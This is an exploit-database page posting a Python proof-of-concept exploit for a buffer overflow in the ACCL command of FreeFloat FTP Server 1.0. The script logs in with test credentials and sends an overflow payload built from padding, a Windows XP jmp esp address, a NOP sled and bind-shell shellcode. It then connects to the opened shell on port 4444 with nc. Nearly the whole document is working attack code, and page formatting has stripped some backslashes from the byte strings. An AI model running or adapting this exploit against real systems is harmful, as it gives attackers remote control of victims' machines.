Home / exploits FreeFloat FTP Server 1.0 ACCL Buffer Overflow
Posted on 20 July 2011
#!/usr/bin/python # #[+]Exploit Title: FreeFloat FTP Server ACCL Buffer Overflow Exploit #[+]Date: 19�62011 #[+]Author: mortis #[+]Software Link: http://www.freefloat.com/software/freefloatftpserver.zip #[+]Version: 1.00 #[+]Tested On: Windows XP SP3 English #[+]CVE: N/A # from socket import * import sys, struct, os def sploit(host, port): #open listener shell on port 4444 sc = "xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xe0x66" sc += "x1cxc2x83xebxfcxe2xf4x1cx8ex4axc2xe0x66x4fx97xb6" sc += "x31x97xaexc4x7ex97x87xdcxedx48xc7x98x67xf6x49xaa" sc += "x7ex97x98xc0x67xf7x21xd2x2fx97xf6x6bx67xf2xf3x1f" sc += "x9ax2dx02x4cx5exfcxb6xe7xa7xd3xcfxe1xa1xf7x30xdb" sc += "x1ax38xd6x95x87x97x98xc4x67xf7xa4x6bx6ax57x49xba" sc += "x7ax1dx29x6bx62x97xc3x08x8dx1exf3x20x39x42x9fxbb" sc += "xa4x14xc2xbex0cx2cx9bx84xedx05x49xbbx6ax97x99xfc" sc += "xedx07x49xbbx6ex4fxaax6ex28x12x2ex1fxb0x95x05x61" sc += "x8ax1cxc3xe0x66x4bx94xb3xefxf9x2axc7x66x1cxc2x70" sc += "x67x1cxc2x56x7fx04x25x44x7fx6cx2bx05x2fx9ax8bx44" sc += "x7cx6cx05x44xcbx32x2bx39x6fxe9x6fx2bx8bxe0xf9xb7" sc += "x35x2ex9dxd3x54x1cx99x6dx2dx3cx93x1fxb1x95x1dx69" sc += "xa5x91xb7xf4x0cx1bx9bxb1x35xe3xf6x6fx99x49xc6xb9" sc += "xefx18x4cx02x94x37xe5xb4x99x2bx3dxb5x56x2dx02xb0" sc += "x36x4cx92xa0x36x5cx92x1fx33x30x4bx27x57xc7x91xb3" sc += "x0ex1exc2xf1x3ax95x22x8ax76x4cx95x1fx33x38x91xb7" sc += "x99x49xeaxb3x32x4bx3dxb5x46x95x05x88x25x51x86xe0" sc += "xefxffx45x1ax57xdcx4fx9cx42xb0xa8xf5x3fxefx69x67" sc += "x9cx9fx2exb4xa0x58xe6xf0x22x7ax05xa4x42x20xc3xe1" sc += "xefx60xe6xa8xefx60xe6xacxefx60xe6xb0xebx58xe6xf0" sc += "x32x4cx93xb1x37x5dx93xa9x37x4dx91xb1x99x69xc2x88" sc += "x14xe2x71xf6x99x49xc6x1fxb6x95x24x1fx13x1cxaax4d" sc += "xbfx19x0cx1fx33x18x4bx23x0cxe3x3dxd6x99xcfx3dx95" sc += "x66x74x32x6ax62x43x3dxb5x62x2dx19xb3x99xccxc2" padding = "A"*246 sled = "x90"*20 jmpesp = struct.pack('<L',0x7C874413) #jmp esp winxp3 sploit = padding + jmpesp + sled + sc s = socket(AF_INET,SOCK_STREAM) s.connect((host,port)) s.recv(1024) s.send("USER test ") s.recv(1024) s.send("PASS test ") s.recv(1024) s.send("ACCL "+sploit+" ") s.close() if __name__ == '__main__': if (len(sys.argv) < 3): print " Usage: freefloat.py <host> <port> " sys.exit() else: host = sys.argv[1] port = sys.argv[2] sploit(host, int(port)) os.system("nc " + host + " 4444")
